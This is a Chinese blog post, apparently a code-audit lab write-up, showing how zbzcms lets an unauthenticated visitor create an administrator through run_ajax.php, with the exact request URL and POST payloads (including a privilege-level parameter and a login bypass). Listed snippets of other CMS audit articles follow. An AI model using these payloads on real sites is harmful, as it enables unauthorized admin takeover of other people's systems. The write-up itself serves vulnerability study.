zbzcms代码审计实验2

最新推荐文章于 2023-04-01 15:49:58 发布
最新推荐文章于 2023-04-01 15:49:58 发布
阅读量2.9k 收藏 1
点赞数 2
文章标签: 安全 php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/A1956936030/article/details/121921591
版权

前台未授权添加管理员

一、用seay代码审计系统,自动审计代码,发现可疑代码

在这里插入图片描述

二、查看代码,并分析看看

在这里插入图片描述

发现可疑参数mima和guanliyuan,即密码和管理员,
构造URL

/cms/cms/admin/run_ajax.php?run=admin

构造payload

mima=haha123&guanliyuan=haha

三、使用hackbar插件执行payload

发现返回一个值为5
在这里插入图片描述
尝试用构造的管理员用户和密码登录看看
在这里插入图片描述
发现权限不足无法登录,这里有两种方法解决

第一种

在这里插入图片描述
payload参数加入&dengji=1

mima=haha123&guanliyuan=haha&dengji=1

成功获取权限在这里插入图片描述

第二种

分析代码,分析可以通过其他参数绕过
在这里插入图片描述
构造payload

/cms/cms/admin/run_ajax.php?run=login
guanliyuan=haha$pwd=haha123

执行看看
在这里插入图片描述
刷新发现成功进入后台
在这里插入图片描述

哇哇**
关注
代码审计:熊海cms Cooike欺骗进入后台复现
qq_43233085的博客
03-16 874
代码审计:熊海cms Cooike欺骗进入后台复现熊海cms代码审计漏洞复现 熊海cms 熊海CMS是由熊海开发的一款可广泛应用于个人博客,个人网站,企业网站的一套网站综合管理系统。 适用于个人博客、个人网站、企业网站等各种用途,前台采用电脑、移动端两种显示模式,后台使用HML5响应式布局。 代码审计 问题出在inc->checklogin.php文件,具体代码如下: <?php $...
zzcms8.2 用户修改密码漏洞
xdjxi的博客
03-03 4395
既然注册的地方存在逻辑漏洞,未对图形验证码做任何防护。那大胆猜测一下,找回密码处也存在漏洞 好的,抓包 这是找回密码的界面,很简单,就一个图形验证,但刚刚已经发现,注册的地方图形验证好像也没什么用,那估计这里也一样。 继续下一步 发现需要验证码,但是邮箱地址是假的啊,上哪找去,emmm,在经过了一般思考后,我决定先把每一步用burp抓包看一下,然后发现它返回的包是这样的 这是一个JavaScript代码 题外话:刚刚检测用户是否存在也是这个提示,或许待会可以试试用户注册重置 先..
zbzcms代码审计
yzl_007的博客
05-27 1098
zbzcms审计 自己的一个简单记录,可能写的有点混乱,欢迎师傅们指出。 环境搭建 http://127.0.0.1/zbzcms/cms/cms/install/index.php 直接可以自动安装好 正常前台界面 开始 初次学习,就跟着师傅的文章一步步来,正常第一步就seay扫一遍 1、任意文件删除 $run传入,并没有做删除的校验判断 右键全文跟踪 跟到 get传入,up.php 的路径就是:/cms/cms/include/up.php?run=del get请求一下路径: 还是很
使用zbzcms.com进行代码审计
qq_62673514的博客
01-15 312
使用zbzcms.com进行代码审计
PHP代码审计
weixin_30814223的博客
01-17 242
文档去年做的,按说应该更新了,写得不咋好,有些没写全,参考了很多文档。 话说owasp codereview,也该出2.0了。 牛们路过,给提点建议。 目录 1. 概述 3 2. 输入验证和输出显示 3 2.1 命令注入 4 2.2 跨站脚本 4 2.3 文件包含 5 2.4 代码注入 5 2.5 SQL注入 6 2.6 XPath注入 6 2.7 HTTP响应拆分 6 2.8 文件...
实验一 静态代码编码规范审计实验
最新发布
qq_59611876的博客
04-01 565
DVWA在不同环境下的搭建,代码审计工具RIPS的介绍
Web自动化测试 —— 测试环境搭建 (Selenium+Python) Windows篇
热门推荐
技在手,能在身,思在脑,从容过生活。
08-06 4万+
2017年6月8日/星期四/阴 (说明:文中提到的网址,在本文完成时都是可以访问的,如果后期不能访问了,可以用文中提到的方法尝试找到新的获取方式) 环境搭建前的准备:   1,到Python官网下载Python安装包:https://www.python.org/   如果不能访问,可以试试下面的解决办法:   a)。安装VPN网络连接工具,推荐用绿色VPN,我用的时候是免费的。   ...
网络安全审计之CMS代码审计
kali_Ma的博客
12-29 3323
0x00:环境说明 Windows 10 Phpstuby Php版本:7.2.9 CMS版本:MetInfo7.5.0 0x01:目录结构 |-- about |-- about1 |-- admin |-- app |-- cache |-- case |-- config |-- download |-- favicon.ico |-- feedback |-- hits |-- img |-- include |-- index.php |-- install |-- job |-- member
代码安全审计实践
一个梦想(I Have a dream)
01-13 921
代码安全审计实践代码安全审计的内容代码安全审计的工具源码安全检查第三方依赖包安全代码安全审计的落地参考文档 2020年安全相关的事务变多了,也因此更注重安全合规相关的工作了。其中代码安全审计是安全开发生命周期(SDL)中重要的内容,这一年中也正好负责这块的相关工作,这边做个小结。 代码安全审计的内容 代码安全审计的目的通过对源代码进行审查,找出并修复代码中的各种可能影响系统安全的潜在风险,通过提高代码的自身质量,达到降低系统风险的目的。往往由于代码量大,代码安全审计一般会借助静态分析类工具,对代码进行自动检
代码审计安全实践
qq_53058639的博客
03-19 394
没学过的同学也不要慌,可以去B站搜索相关视频,你搜关键词网络安全工程师会出现很多相关的视频教程,我粗略的看了一下,排名第一的视频就讲的很详细。]escape_string()等函数过滤SQL语句,输人一个string类型的参数,为要过滤的命令,返回过滤后的sting类型的命令,过滤后的string类型的命令,过滤的字符为。从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。
一次代码审计实战案例【思路流程】
qq_53058639的博客
02-15 500
1、一些敏感业务不要轻易放到公网服务器上,放上一定要做好安全。2、在溯源分析时,遇到傀儡机可以考虑下蹭马利用的方式。3、数据库密码哈希值获取,搜寻敏感信息。4、社工查询:谷歌搜索、QQ资料、细心关联分析。网络安全入门学习路线其实入门网络安全要学的东西不算多,也就是网络基础+操作系统+中间件+数据库,四个流程下来就差不多了。1.网络安全法和了解电脑基础其中包括操作系统Windows基础和Linux基础,标记语言HTML基础和代码JS基础,以及网络基础、数据库基础和虚拟机使用等...
熊海cms代码审计
0xdawn的博客
11-10 2637
0x00 前言 ​ 做这次代码审计的时候,距离看《代码审计:企业级web代码安全架构》一书已经过去了差不多一个月的时间了。借着这次机会,开启自己的代码审计之旅吧! 0x01 seay自动审计 环境搭建 本地留了一份进行源码审计,虚拟机win7下搭建作为攻击利用 本地审计 把cms丢进seay源代码审计系统里,先自动审计一番 发现34个可疑漏洞,接下来要做的就是逐一排查,以防误报 0x02 ...
cms代码审计练习
黑面狐
04-18 1557
1、letter-post 存在xss漏洞打开写信文件modul/letter/post.phppost 提交进来的数据都经过p8_stripslashes2函数处理跟踪p8_stripslashes2函数lang/inc/init.php可以判断magic_qutes 开启时直接使用p8_stripslashes函数,不开启时直接返回输入的字符继续追踪p8_stripslashes函数删掉反斜杠...
代码审计】xhcms_v1.0
Vicl1fe的博客
02-22 1286
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 环境: cms下载地址:http://down.chinaz.com/soft/39154.htm phpstudy php 5.5.45 mysql 5.5.53 想学学代码审计。拿个小众点的来看看吧。 sql注入 安装步骤不说了,安装好后如下图。 看到这个站点就想随便点一点。,然后看看url的参数。 ...
cms代码审计RCE&艰难bypass(思路清奇)
weixin_42508548的博客
11-24 430
闲来无事挖挖漏洞,发现一个经过了一些过滤的漏洞,踩了无数的坑,然后冥思苦想了许多方法,终于找到了一个点,使得可以进行命令执行与getshell。这里的漏洞点不值一提,但是因为绕过方法挺好玩的,故在这里分享一下思路,大佬勿喷~ 思路不唯一,也希望有其他方法的话,大佬们可以不吝赐教,在评论区留下具体方法,谢谢大家~ 0x02 代码审计环境 此次代码审计采用的是phpstudy一键式搭建。 phpstudy下载地址:Windows版phpstudy下载 - 小皮面板(phpstudy)
[代码审计]Mini CMS V1.1-最新版
DYBOY-程序开发&网络安全
07-31 838
为什么最近老是在做代码审计呐?一是想要学习其他优秀开发者的架构和设计模式,二是挖掘一下开发者在开发过程中不严谨之处,作为前车之鉴。 有朋友就在问小东,哪儿找到这么多的CMS审计?这里说明一下,因为在代码审计方面还比较菜,只得大面积撒网,找小众的CMS来审计学习,所以就写了一个小爬虫,把CNVD上的CMS列表厂商都给抓下来了。 爬虫源码如下: # title: 抓取CNVD漏洞CM...
学习 对程氏舞曲CMS3.0的代码审计
我多么希望明天有太阳,来灼烧我腐烂的梦想
04-17 575
from:http://www.wooyun.org/bugs/wooyun-2013-044824 属于php漏洞挖掘。本来先搞套源码自己试试。。无奈没从网上找到源码。 code1: function CS_Request($pi_strName) { set_magic_quotes_runtime(0); //明显要用addslashes
“快看”cms v1.32代码审计
include_voidmain的博客
07-04 1303
CMS代码审计
PHP代码审计实战之XDcms
Mi1k7ea
10-21 4155
这里主要讲v2.0.8版本的XDcms中的一个基于错误的SQL注入漏洞,较v2.0.7版本而言修复了很多注入漏洞,使得注入漏洞大为减少。 至于CMS的下载配置等就不说了,直接审计吧~ 先整体看,点击index.php,先判断是否存在文件config.inc.php,若不存在则重定向去安装;然后就是通过require()函数包含/system/common.inc.php文件:
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值